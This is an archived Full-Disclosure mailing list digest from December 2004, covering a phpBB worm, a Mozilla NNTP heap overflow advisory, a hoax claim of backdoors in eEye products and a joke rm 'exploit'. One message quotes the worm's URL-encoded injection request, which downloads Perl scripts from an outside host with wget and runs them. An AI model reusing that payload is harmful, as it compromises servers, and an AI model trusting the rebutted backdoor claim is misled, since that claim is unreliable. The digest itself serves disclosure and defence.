Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

[Full-Disclosure] RE: Full-disclosure Digest, Vol 1, Issue 2144
From: <steve.dangerfield () syntegra com>
Date: Thu, 30 Dec 2004 15:34:13 -0000

Please unsubscribe me from this list

-----Original Message-----
From: full-disclosure-request () lists netsys com
[mailto:full-disclosure-request () lists netsys com] 
Sent: 30 December 2004 03:26
To: full-disclosure () lists netsys com
Subject: Full-disclosure Digest, Vol 1, Issue 2144

Send Full-Disclosure mailing list submissions to
        full-disclosure () lists netsys com

To subscribe or unsubscribe via the World Wide Web, visit
        https://lists.netsys.com/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
        full-disclosure-request () lists netsys com

You can reach the person managing the list at
        full-disclosure-owner () lists netsys com

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."


Today's Topics:

   1. Re: Re: new phpBB worm affects 2.0.11 (Paul Laudanski)
   2. Re: Again: zone transfers, a spammer's dream? (Jorrit Kronjee)
   3. Re: Suspect phpBB users (Ron Brogden)
   4. Re: And you're proud of this Mike Evanchick? (Michael Reilly)
   5. Heap overflow in Mozilla Browser <= 1.7.3 NNTP    code.
      (Maurycy Prodeus)
   6. Re: And you're proud of this Mike Evanchick? (Ill will)
   7. Re: And you're proud of this Mike Evanchick? (Michael Evanchik)
   8. Is that your password? (psirt () cisco com)
   9. Re: more: Isecom, osstm related: CRG was busted yesterday (Crg)
  10. RE: Multiple Backdoors found in eEye Products     (IRISand
      SecureIIS) (Marc Maiffret)
  11. Trivial Bug in Symantec Security Products (J. Oquendo)
  12. /bin/rm file access vulnerability (Lennart Hansen)
  13. Re: Multiple Backdoors found in eEye Products (IRIS       and
      Secure (Lance Gusto)
  14. Re: /bin/rm file access vulnerability (Sean Harlow)
  15. MDKSA-2004:159 - Updated glibc packages fix       temporary file
      vulnerability (Mandrake Linux Security Team)


----------------------------------------------------------------------

Message: 1
Date: Wed, 29 Dec 2004 12:42:42 -0500 (EST)
From: Paul Laudanski <zx () castlecops com>
Subject: Re: [Full-disclosure] Re: new phpBB worm affects 2.0.11
To: Adam <adam () fazed org>
Cc: bugtraq () securityfocus com, full-disclosure () lists netsys com
Message-ID:
        <Pine.LNX.4.44.0412291241030.25738-100000 () bugsbunny castlecops com>
Content-Type: TEXT/PLAIN; charset=US-ASCII

Here are some samples of what this one does, and some statistics on 
300,000 hits in 55 hours:

http://castlecops.com/article-5642-nested-0-0.html

On Sat, 25 Dec 2004, Adam wrote:

The request for this one (even against a non phpBB scripts) appears to 
look like this:

"GET 

/?p=comments&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20
crowklan.mine.nu/~pillar/.zk/coll;perl%20coll;wget%20crowklan.mine.nu/~pillar
/.zk/aol;perl%20aol;rm%20-rf%20aol.*;rm%20-rf%20coll*%3B%20%65%63%68%6F%20%5F
%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47
%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 
HTTP/1.1"

-- 
Regards,

Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.





------------------------------

Message: 2
Date: Wed, 29 Dec 2004 19:49:46 +0100
From: Jorrit Kronjee <full-disclosure () nospam wafel org>
Subject: Re: [Full-disclosure] Again: zone transfers, a spammer's
        dream?
To: bugtraq () securityfocus com, full-disclosure () lists netsys com
Message-ID: <41D2FC4A.60702 () nospam wafel org>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Ralf Glauberman wrote:
Hello all,
after Lode Vermeiren having published on the 7th of December that many
tlds are transferable I did further research on this. Much to my
surprise this wasn't just a problem of little states. i did a complete
scan on all tlds (http://data.iana.org/TLD/tlds-alpha-by-domain.txt)
including every soa and ns server. i got results from 141 out of the
258 checked tlds. i din't check every single output, but there are not
more than 10 false-positives within these. while the ca zone is secure
now, i was really surprised that be (~ 42 MB, ~ 900.000 records) and
fi (~ 11 MB, ~ 235.000 records) are transferable.
all in all, i found that the following tlds are transferable (also
there might be some false-positives):

arpa being one of those false positives (it's hardly exploitable by 
spammers anyway).

Although only a few nameservers of the tld allow zone transfers - and 
you really have to look for them - it really amazes me that these 
nameservers aren't properly configured.

I'm just glad I don't live in any of these countries.

Jorrit



------------------------------

Message: 3
Date: Wed, 29 Dec 2004 10:58:40 -0800
From: Ron Brogden <domains () islandnet com>
Subject: Re: [Full-disclosure] Suspect phpBB users
To: full-disclosure () lists netsys com
Message-ID: <200412291058.40811.domains () islandnet com>
Content-Type: text/plain;  charset="iso-8859-1"

On December 25, 2004 15:54, Jack Yan wrote:
    We have since upgraded, but among our new users over the last few days 
have been a Weber361, a Weber395, and a nderevyanko.

This looks like the fallout from a standard run of the mill spam bot.  Thep
 oint of its actions being to generate as many distinct links back to theu
 ser's site as possible so as to increase their search engine placement. T
 his is similar to referrer spamming in HTTP logs - just in this case it isa
 n automated bot spamming forums instead of some other target.  I doubt it is

caused by a worm, more likely one or more machines running dedicated software

(though it is possible this is installed on zombie machines I suppose).

Cheers



------------------------------

Message: 4
Date: Wed, 29 Dec 2004 12:50:57 -0800
From: Michael Reilly <michaelr () cisco com>
Subject: Re: [Full-disclosure] And you're proud of this Mike
        Evanchick?
To: Todd Towles <toddtowles () brookshires com>
Cc: full-disclosure () lists netsys com
Message-ID: <41D318B1.4070605 () cisco com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Couldn't help seconding this.  I do not understand the purpose of he 
original message.  I think Norton/Symantec did a good job.

michael
Todd Towles wrote:
Sounds like you need AV and a bit of network security. If you are scared
of IRC trojans and detectable viruses..then your time would be better
spent putting those systems into place. Don't you think?


________________________________

      From: full-disclosure-bounces () lists netsys com
[mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Elle
Chicka
      Sent: Monday, December 27, 2004 11:16 PM
      To: full-disclosure () lists netsys com
      Subject: [Full-disclosure] And you're proud of this Mike
Evanchick?
      
      
      You so proudly posted this:
      ------------------------
      
http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.ht
ml
<https://mail.microsoft.com/exchweb/bin/redir.asp?URL=http://securityres
ponse.symantec.com/avcenter/venc/data/trojan.phel.a.html> 
      
      mike
      
      www.michaelevanchik.com
       
      ------------------------
      Obviously you are just tickled to see that the kiddies were able
to so quickly turn your point/click sploit code into a virus to wreak
havoc on my network.
      
      Thanks a lot for helping to make all of us a little less secure
over the holiday's.
       

      __________________________________________________
      Do You Yahoo!?
      Tired of spam? Yahoo! Mail has the best spam protection around 
      http://mail.yahoo.com 




------------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
---- ---- ----
Michael Reilly    michaelr () cisco com
     Cisco Systems,  California


------------------------------

Message: 5
Date: Wed, 29 Dec 2004 22:24:21 +0100 (CET)
From: Maurycy Prodeus <z33d () isec pl>
Subject: [Full-disclosure] Heap overflow in Mozilla Browser <= 1.7.3
        NNTP    code.
To: full-disclosure () lists netsys com
Cc: bugtraq () securityfocus com
Message-ID: <Pine.LNX.4.44.0412292222140.19156-200000 () isec pl>
Content-Type: text/plain; charset="us-ascii"



********************************************************************

This email may contain information which is privileged or confidential. If you are not the intended recipient of this 
email, please notify the sender immediately and delete it without reading, copying, storing, forwarding or disclosing 
its contents to any other person
Thank you

Check us out at http://www.bt.com/consulting

********************************************************************


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Synopsis:  Heap overflow in Mozilla Browser <= 1.7.3 NNTP code. 
Product:   Mozilla Browser
Version:   <= 1.7.3
Vendor:    http://www.mozilla.org/
URL:       http://isec.pl/vulnerabilities/isec-0020-mozilla.txt
CVE:       not assigned
Author:    Maurycy Prodeus <z33d () isec pl>
Date:      Dec 29, 2004



Issue:
======

A critical security vulnerability has been found in Mozilla Project code
handling NNTP protocol.


Details:
========

Mozilla browser supports NNTP urls. Remote side is able to trigger  news://
connection to any server. I found a flaw in NNTP handling code which may
cause heap overflow and allow remote attacker to execute arbitrary code on
client machine.

Bugus function from nsNNTPProtocol.cpp:

char *MSG_UnEscapeSearchUrl (const char *commandSpecificData)
329 {
330     char *result = (char*) PR_Malloc (PL_strlen(commandSpecificData) +
1);
331     if (result)
332     {
333         char *resultPtr = result;
334         while (1)
335         {
336             char ch = *commandSpecificData++;
337             if (!ch)
338                 break;
339             if (ch == '\\')
340             {
341                 char scratchBuf[3];
342                 scratchBuf[0] = (char) *commandSpecificData++;
343                 scratchBuf[1] = (char) *commandSpecificData++;
344                 scratchBuf[2] = '\0';
345                 int accum = 0;
346                 PR_sscanf(scratchBuf, "%X", &accum);
347                 *resultPtr++ = (char) accum;
348             }
349             else
350                 *resultPtr++ = ch;
351         }
352         *resultPtr = '\0';
353     }
354     return result;
355 }

When commandSpecificData points to last (next is NULL) character which
is '\\' copying loop may omit termination of source char array and overflow
result buffer.


Affected Versions
=================

Mozilla Browser <= 1.7.3 with mozilla-mail

Solution
=========

This bug is fixed in Mozilla 1.7.5. (Bug 264388)
Mozilla developer Dan Veditz claims that it cannot be exploitable:
"A '\' on the end will certainly trash memory, but at that point you're no
longer reading attacker-supplied data;". 

On my RedHat 9.0 with Mozilla 1.7.3 attached proof of concept code 
overflows the buffer using attacker-supplied data. I decided to make this
bug public because Mozilla Team hasn't warned users.


Exploitation
============

I have attached proof of concept HTML file which causes heap corruption
and crashes Mozilla 1.7.3 browser (with mozilla-mail). News server must be
existing and available.


- -- 
Maurycy Prodeus
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFB0yCXC+8U3Z5wpu4RAgmGAKDrytVxxUc0vS/9+BZNf+P+lGyoLQCeL5wN
atw5z5/GvBsG9SVKWeGZSbk=
=eTqU
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL:
http://lists.netsys.com/pipermail/full-disclosure/attachments/20041229/8cbaf9
f1/nntp_crash-0001.html

------------------------------

Message: 6
Date: Wed, 29 Dec 2004 16:49:59 -0500
From: Ill will <xillwillx () gmail com>
Subject: Re: [Full-disclosure] And you're proud of this Mike
        Evanchick?
Cc: full-disclosure () lists netsys com
Message-ID: <47fe50604122913491c574157 () mail gmail com>
Content-Type: text/plain; charset=US-ASCII

quitcher bitchin and get to work


On Wed, 29 Dec 2004 08:48:24 -0600, Todd Towles
<toddtowles () brookshires com> wrote:
 
Sounds like you need AV and a bit of network security. If you are scared of
IRC trojans and detectable viruses..then your time would be better spent
putting those systems into place. Don't you think?
 
 
 ________________________________
 From: full-disclosure-bounces () lists netsys com
[mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Elle Chicka
Sent: Monday, December 27, 2004 11:16 PM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] And you're proud of this Mike Evanchick?

 
 
You so proudly posted this: 
------------------------ 
http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html

mike

www.michaelevanchik.com 
  
------------------------ 
Obviously you are just tickled to see that the kiddies were able to so
quickly turn your point/click sploit code into a virus to wreak havoc on my
network.
 
Thanks a lot for helping to make all of us a little less secure over the
holiday's. 
  

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html





-- 
- illwill
http://illmob.org


------------------------------

Message: 7
Date: Wed, 29 Dec 2004 18:02:55 -0500
From: "Michael Evanchik" <Mike () MichaelEvanchik com>
Subject: Re: [Full-disclosure] And you're proud of this Mike
        Evanchick?
To: "Todd Towles" <toddtowles () brookshires com>,      "Elle Chicka"
        <c1b3r_chick () yahoo com>, <full-disclosure () lists netsys com>
Message-ID: <01a701c4edfa$88578320$6702a8c0 () AlanPickel com>
Content-Type: text/plain; charset="iso-8859-1"

Todd,

Listen, you are so wrong i cant belive you even have the guts to post this.
How stupid can you be?  Norton or any AVP can easily be fooled.  The active x
object "ca"+n b"+ +e crea" +ted" like this. code changed around , or even
different local code can be used and tada AVP is fooled.  Only a true patch
from microsoft or disable the help control in the registry is going to stop
this.  Her concern is wise.  

Mike
www.michaelevanchik.com

  ----- Original Message ----- 
  From: Todd Towles 
  To: Elle Chicka ; full-disclosure () lists netsys com 
  Sent: Wednesday, December 29, 2004 9:36 AM
  Subject: RE: [Full-disclosure] And you're proud of this Mike Evanchick?


  Well, if you have Norton, it couldn't wreak havoc...now could it? Most of
the AV compaines are now detecting the exploit. This detection response is
much faster than most of the other exploits which are wreaking havoc on your
network, so it would sound.


  Nice work to Norton.



----------------------------------------------------------------------------
    From: full-disclosure-bounces () lists netsys com
[mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Elle Chicka
    Sent: Monday, December 27, 2004 11:16 PM
    To: full-disclosure () lists netsys com
    Subject: [Full-disclosure] And you're proud of this Mike Evanchick?


    You so proudly posted this:
    ------------------------
 
http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html

    mike

    www.michaelevanchik.com

    ------------------------
    Obviously you are just tickled to see that the kiddies were able to so
quickly turn your point/click sploit code into a virus to wreak havoc on my
network.

    Thanks a lot for helping to make all of us a little less secure over the
holiday's.

    __________________________________________________
    Do You Yahoo!?
    Tired of spam? Yahoo! Mail has the best spam protection around 
    http://mail.yahoo.com 
-------------- next part --------------
An HTML attachment was scrubbed...
URL:
http://lists.netsys.com/pipermail/full-disclosure/attachments/20041229/84b847
7d/attachment-0001.htm

------------------------------

Message: 8
Date: Wed, 29 Dec 2004 16:10:53 -0800
From: psirt () cisco com
Subject: [Full-disclosure] Is that your password?
To: full-disclosure () lists netsys com
Message-ID: <200412300010.iBU0AqvO028393 () lists netsys com>
Content-Type: text/plain; charset="windows-1252"

I have attached it to this mail.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: pwd02.txt.scr
Type: application/octet-stream
Size: 29568 bytes
Desc: not available
Url :
http://lists.netsys.com/pipermail/full-disclosure/attachments/20041229/a40429
a2/pwd02.txt-0001.obj

------------------------------

Message: 9
Date: Thu, 30 Dec 2004 01:43:51 +0100
From: "Crg" <crg () digitalsec net>
Subject: Re: [Full-disclosure] more: Isecom,    osstm related: CRG was
        busted yesterday
To: full-disclosure () lists netsys com
Message-ID: <006301c4ee08$d2342bc0$0302a8c0 () sia es>
Content-Type: text/plain;       charset="iso-8859-1"

Well, Im not arrested, seems to be just a hoax for 28th of Dec (it's like
1st April in Spain).



Keep the pr0j3kt alive
Best regards & xmas

Pedro Andujar (Crg)
!dSR - Digital Security Research
http://www.digitalsec.net

----------------------------------------------------------------------------
-------------------------

Author: your_momma () hushmail com
Date: 2004-12-28 02:332004-12-28 01:33 +100UTC
To: full-disclosure
CC:
Subject: [Full-disclosure] Isecom, osstm related: CRG was busted yesterday



 Flame wars are always bad wars. Yesterday one of us was busted by
police and !dsr homes were abused looking for profit incoming about
hacking isecom site.


 Crg was busted because of his curiosity, his funny way of
learning. He's not an enemy, he's harmless, had no any weapon, not
like the people that took him when he was going to school. Isecom
can now be happy, another young boy hanged, time to make more cash
with their "hackers high school".


 At the moment we only know one being arrested and other two under
search. Names were not especified, and families are being contacted
hardly withouth any kind of mercy because of christmas time.


 We're tired of this.. Anger.. War is over.. we're about rolf the
whole planet.


 Stop playing with us!



------------------------------

Message: 10
Date: Wed, 29 Dec 2004 17:33:11 -0800
From: "Marc Maiffret" <mmaiffret () eeye com>
Subject: RE: [Full-disclosure] Multiple Backdoors found in eEye
        Products        (IRISand SecureIIS)
To: "Lance Gusto" <thegusto22 () hotmail com>,
        <vuln-dev () securityfocus com>,        <ntbugtraq () listserv ntbugtraq com>,
        <bugs () securitytracker com>,  <full-disclosure () lists netsys com>,
        <news-editor () securityfocus com>,     <press () net-security org>
Message-ID:
        <19F34051C5BB60429ACD1BF01338C598E9A975 () av-mail01 corp int-eeye com>
Content-Type: text/plain;       charset="us-ascii"

Hi Lance Gusto,

It is really interesting that someone with such a disdain for my company
would go out of their way to spam out an email about a supposed backdoor
within our products, choose not to contact us ahead of time, and then
provide no real details to prove your claim... Ahhh but wait, you chose
not to provide any details because you're a "good guy". As you said:
"Unfortunately, we can't release the "exploits" publicly due to the
severity of these flaws." Right.

The reason you could not provide any real details about these backdoors
are because there are no backdoors in Iris nor SecureIIS. 

While I would not wish to give someone like you the time of day nor 15
minutes of infamy, eEye does take every security claim very seriously.
We have performed an audit of SecureIIS and Iris code to re-verify what
we already knew, that there are no backdoors in either of them.

It is quite possible that you downloaded fake warez versions of our
products from peer-to-peer networks which someone might have put there
to trick people and put backdoors on their systems. However, if such
warez product versions existed they would not be from eEye as we do not
distribute our software on peer-to-peer networks nor recommend people
downloading warez versions from there.  Get your warez from a trusted
distributor. ;-) If you would have contacted us we could have saved you
the embarrassment... But then you are sending emails from Hotmail
through a proxy at a university in Germany so I seriously doubt you care
if your persona "Lance Gusto" gets embarrassed on public mailing lists.


These backdoors are as much of a reality as Santa Claus but then you
seem to be childish enough that you probably still believe in the jolly
red man. Maybe next you can follow-up your humors eMail with a spoofed
advisory about a backdoor you found in Rudolph "the red nosed reindeer".
At least then you could promote yourself from being a coward to a
comedian.

Thank you, please drive through.

Signed,
Marc Maiffret
Chief Hacking Officer
eEye Digital Security
T.949.349.9062
F.949.349.9538
http://eEye.com/Blink - End-Point Vulnerability Prevention
http://eEye.com/Retina - Network Security Scanner
http://eEye.com/Iris - Network Traffic Analyzer
http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities 

Important Notice: This email is confidential, may be legally privileged,
and is for the intended recipient only. Access, disclosure, copying,
distribution, or reliance on any of it by anyone else is prohibited and
may be a criminal offense.  Please delete if obtained in error and email
confirmation to the sender. P.S. I'm going to tell you this for your own
benefit, your email was dope as hell especially since you faked 90
percent of it. What you need to do is practice on your freestyle before
you come up missing like triple m's police file.

| -----Original Message-----
| From: full-disclosure-bounces () lists netsys com 
| [mailto:full-disclosure-bounces () lists netsys com] On Behalf 
| Of Lance Gusto
| Sent: Tuesday, December 28, 2004 8:12 PM
| To: vuln-dev () securityfocus com; 
| ntbugtraq () listserv ntbugtraq com; bugs () securitytracker com; 
| full-disclosure () lists netsys com; 
| news-editor () securityfocus com; press () net-security org
| Subject: [Full-disclosure] Multiple Backdoors found in eEye 
| Products (IRISand SecureIIS)
| 
| Multiple Backdoors found in eEye Products (IRIS and 
| SecureIIS) L. Gusto <thegusto22 () hotmail com>
| 
| 
| Summary:
| 
| During meticulous testing of both eEye's IRIS and SecureIIS 
| products, we (my testing team) have discovered multiple 
| backdoors in the latest of both mentioned products and some 
| older versions we could acquire.
| 
| 
| These backdoors are very cleverly hidden (kudos to the 
| authors), I personally don't condone illegally backdooring 
| commercial products, and personally I don't think much of 
| eEye but I must give credit to where credit is due.
| 
| 
| We have tested IRIS 3.7 and up they all appear to have a backdoor.
| We have verified the IRIS backdoor doesn't exist in versions 
| prior to 3.0
| 
| 
| We have tested SecureIIS 2.0 and up they all appear to have a 
| backdoor.
| We have verified that SecureIIS 1.x series does not have this 
| specific backdoor.
| 
| Bringing the backdoors to light:
| 
| After long testing we discovered the exact sequences used to 
| active the backdoor. Unfortunately, we can't release the 
| "exploits" publically due to the severity of these flaws. But 
| incomplete examples will be given.
| 
| 
| 
| The IRIS Backdoor:
| 
| This one is quite interesting. We have discovered that 
| sending a specifically crafted UDP datagram to a IRIS host 
| *directly* (not through the wire or to host on the network 
| segment) with certain IP options set and a certain magic 
| value at a undisclosed offset in the payload will bind a 
| shell to the source port specified in the UDP datagram.
| 
| [snip]
| 
| 
| The SecureIIS Backdoor:
| 
| The SecureIIS backdoor was alot easier to discover but very 
| well placed. The SecureIIS backdoor is triggered by a 
| specifically crafted HTTP HEAD request. Here is a incomplete 
| layout of how to exploit this:
| 
| 
| HEAD /<24 byte constant string>/PORT_ADDRESS.ASP HTTP/1.1
| 
| PORT          - Will be the port to bind a shell.
| ADDRESS               - Address for priority binding (0 - For any).
| 
| 
| [snip]
| 
| 
| 
| Local Deduction:
| 
| There are a two possiblilites here, either eEye's code has 
| been altered by some attacker or this has been sanctioned by 
| the company (or at least the developers were fully aware of this).
| 
| 
| 
| Conclusion:
| 
| It is very very shameful that a somewhat reputable like eEye 
| is acting in a very childish, unprofessional manner. I figure 
| that is why the code is closed source. There are several 
| active exploits available that I (the author of this 
| advisory) didn't create floating around. The only logical 
| solution will be to not use the mentioned eEye products for 
| the time being or at least downgrade to the non-backdoored versions.
| 
| We will be investigation eEye's Blink Product for any 
| clandestine backdoors.
| 
| _________________________________________________________________
| FREE pop-up blocking with the new MSN Toolbar - get it now! 
| http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/
| 
| _______________________________________________
| Full-Disclosure - We believe in it.
| Charter: http://lists.netsys.com/full-disclosure-charter.html
| 



------------------------------

Message: 11
Date: Wed, 29 Dec 2004 17:56:28 -0500 (EST)
From: "J. Oquendo" <sil () infiltrated net>
Subject: [Full-disclosure] Trivial Bug in Symantec Security Products
To: full-disclosure () lists netsys com
Message-ID: <Pine.GSO.4.58.0412291754080.9648 () kungfunix net>
Content-Type: TEXT/PLAIN; charset=US-ASCII


Impact:  Bug in Symantec products allows for free software updates
Version(s):

Norton AntiVirus for Windows 9x/NT/Me/2000/XP
Symantec Web Security
Symantec AntiVirus Scan Engine
Norton AntiVirus for Gateways
Symantec AntiVirus for Gateways
Norton AntiVirus Corporate Edition
Symantec AntiVirus Corporate Edition
Norton AntiVirus for Exchange

I. BACKGROUND
Symantec whose stock price of $27.38 at market close on December 15, 2004,
valuing the company at approximately $13.5 billion (according to their
home page) has a simple little glitch in the above mentioned products,
which would allow any user who has an expired product to automatically
continue updating without purchasing the software after the program has
expired. Vendor notified on 12/06/2004

II. DESCRIPTION
Any user with an expired copy of the versions listed above can continue to
receive updates at no extra cost. While not a true to form "bug", the
silly workaround can hinder Symantec's future market valuations if users
simply allowed their products to expire, downloaded any "Intelligent
Updater" definitions via
http://securityresponse.symantec.com/avcenter/defs.download.html and
installed them with the clock turned back to a pre-expiration date.

Somehow, Symantec engineers have not implemented a mechanism to disallow a
user from installing the patches via changing the date on their computer
back to when the original program was installed and then running the
"Intelligent Updater."  E.g.: User installs a 60 day trial version with
free updates that expires on Jan, 01, 2005. User goes to install an update
in July 2005 and gets a subscription error. User changes the date back to
some time before the product expired and installs the new definition
without problems. User changes date back forward without problems.

While not of the "Bugtraq" typical bug, Symantec engineers should try to
resolve this to avoid any future revenue loss.

III SOLUTION
Symantec could rewrite their updates to include a timer, or check via
atomic clock. Other options include informing their customers not to
commit the evil act of modifying the dates on their computers.


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
GPG Key ID 0x51F9D78D
Fingerprint 2A48 BA18 1851 4C99

CA22 0619 DB63 F2F7 51F9 D78D
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x51F9D78D

sil @ politrix . org    http://www.politrix.org
sil @ infiltrated . net http://www.infiltrated.net

"How can we account for our present situation unless we
believe that men high in this government are concerting
to deliver us to disaster?" Joseph McCarthy "America's
Retreat from Victory"


------------------------------

Message: 12
Date: Wed, 29 Dec 2004 20:18:25 -0500
From: "Lennart Hansen" <xenzeo () gardener com>
Subject: [Full-disclosure] /bin/rm file access vulnerability
To: full-disclosure () lists netsys com
Message-ID: <20041230011825.21A116EEF6 () ws1-5 us4 outblaze com>
Content-Type: text/plain; charset="iso-8859-1"

/bin/rm file access vulnerability

Affected Products:
         /bin/rm (all versions, tested on FreeBSD and linux)
         (http://www.freebsd.org    http://www.kernel.org)

Author:
         Xenzeo (Ablazed, Ultralaser, Lennart A. Hansen)
         xenzeo at blackhat dot dk


/bin/rm is a program that removes the named file arguments on unix systems.
When /bin/rm is called it checks the file's permissions and the id of the
user
trying to remove the file. If the user does not have the required permissions
to delete the file, /bin/rm will simply reject and exit.

However, it is possible for a person with admin rights (root) to 
delete _any_ file
on the system regardless of who has created it and what it's permissions are.

Proof of concepts:
$ touch /home/xenzeo/file
$ ls -l /home/xenzeo/file
-rw-r--r--  1 xenzeo none 0 Dec 30  2004 /home/xenzeo/file
$ id
uid=1000(xenzeo) gid=513(none) groups=513(none),545(users)
$ su -c 'rm -f /home/xenzeo/file'
$ ls -l /home/xenzeo/file
ls: file: No such file or directory

#!/usr/bin/perl
if ($#ARGV != 0) {
        die "usage: rm-exploit.pl file\r\n";
} else {
    $file = $ARGV[0];
    print "*** CMD: [ /bin/rm -f $file ]\r\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    if ($> == 0) {
       print "[-] EXECUTING CMD\r\n";
       system("/bin/rm -f $file");
       print "[-] DONE\r\n";
       print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
       exit();
    } else {
       print "[-] EXPLOIT FAILED\r\n";
       print "[-] YOU ARE NOT ROOT\r\n";
       print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    }
}

Vender status:
         Neither FreeBSD nor Linux developers have been contacted yet!

-Xenzeo

-- 
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm




------------------------------

Message: 13
Date: Wed, 29 Dec 2004 21:03:02 +0000
From: "Lance Gusto" <thegusto22 () hotmail com>
Subject: Re: [Full-disclosure] Multiple Backdoors found in eEye
        Products (IRIS  and Secure
To: dave () immunitysec com, full-disclosure () lists netsys com
Message-ID: <BAY2-F347D60BC3A6AB7882C2046CC9B0 () phx gbl>
Content-Type: text/plain; format=flowed


Hey Dave,


I cannot disclosed much information (based on request/threats made by 
certain organizations
whom may be involved) I am sure you can understand.

But we have tested Iris versions 3.0 and up ... As I previously stated itd
 oesn't appear to
exist in the 2.x series of Iris.

I am not the main tester involved here, but I was told that there is somes
 ort of clandestine
chaining mechanism to create the processes I believe. I will provide the 
"lists" I have sent this
too with more information as soon as some of the other testers involved come 
back from their
respective holiday breaks.


From: Dave Aitel <dave () immunitysec com>
To: Lance Gusto <thegusto22 () hotmail com>
Subject: Re: [Full-disclosure] Multiple Backdoors found in eEye Products>
 (IRIS and SecureIIS)
Date: Wed, 29 Dec 2004 11:29:55 -0500




The SecureIIS Backdoor:

The SecureIIS backdoor was alot easier to discover but very well
placed. The SecureIIS backdoor is triggered by a specifically
crafted HTTP HEAD request. Here is a incomplete layout of how
to exploit this:


Which version did you test? I'm not seeing it, or any intermodular calls to 
CreateProcess in the DLL that it loads up.

-dave



HEAD /<24 byte constant string>/PORT_ADDRESS.ASP HTTP/1.1

PORT - Will be the port to bind a shell.
ADDRESS - Address for priority binding (0 - For any).


[snip]



Local Deduction:

There are a two possiblilites here, either eEye's code has been
altered by some attacker or this has been sanctioned by the
company (or at least the developers were fully aware of this).



Conclusion:

It is very very shameful that a somewhat reputable like eEye is acting
in a very childish, unprofessional manner. I figure that is why the
code is closed source. There are several active exploits available that I
(the author of this advisory) didn't create floating around. The only
logical solution will be to not use the mentioned eEye products for the
time being or at least downgrade to the non-backdoored versions.

We will be investigation eEye's Blink Product for any clandestine 
backdoors.

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now! 
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



_________________________________________________________________
Don't just search. Find. Check out the new MSN Search! 
http://search.msn.click-url.com/go/onm00200636ave/direct/01/



------------------------------

Message: 14
Date: Wed, 29 Dec 2004 21:17:12 -0500
From: Sean Harlow <sharlow () UTNet UToledo Edu>
Subject: Re: [Full-disclosure] /bin/rm file access vulnerability
To: full-disclosure () lists netsys com
Message-ID: <41D36528.1070308 () utnet utoledo edu>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Is this a joke?

root can delete any file...isn't that the point of being root?  the fact 
that you can do anything with the system, regardless of permissions?

-Sean

Lennart Hansen wrote:
/bin/rm file access vulnerability

Affected Products:
         /bin/rm (all versions, tested on FreeBSD and linux)
         (http://www.freebsd.org    http://www.kernel.org)

Author:
         Xenzeo (Ablazed, Ultralaser, Lennart A. Hansen)
         xenzeo at blackhat dot dk


/bin/rm is a program that removes the named file arguments on unix systems.
When /bin/rm is called it checks the file's permissions and the id of the
user
trying to remove the file. If the user does not have the required
permissions
to delete the file, /bin/rm will simply reject and exit.

However, it is possible for a person with admin rights (root) to 
delete _any_ file
on the system regardless of who has created it and what it's permissions
are.

Proof of concepts:
$ touch /home/xenzeo/file
$ ls -l /home/xenzeo/file
-rw-r--r--  1 xenzeo none 0 Dec 30  2004 /home/xenzeo/file
$ id
uid=1000(xenzeo) gid=513(none) groups=513(none),545(users)
$ su -c 'rm -f /home/xenzeo/file'
$ ls -l /home/xenzeo/file
ls: file: No such file or directory

#!/usr/bin/perl
if ($#ARGV != 0) {
      die "usage: rm-exploit.pl file\r\n";
} else {
    $file = $ARGV[0];
    print "*** CMD: [ /bin/rm -f $file ]\r\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    if ($> == 0) {
       print "[-] EXECUTING CMD\r\n";
       system("/bin/rm -f $file");
       print "[-] DONE\r\n";
       print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
       exit();
    } else {
       print "[-] EXPLOIT FAILED\r\n";
       print "[-] YOU ARE NOT ROOT\r\n";
       print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    }
}

Vender status:
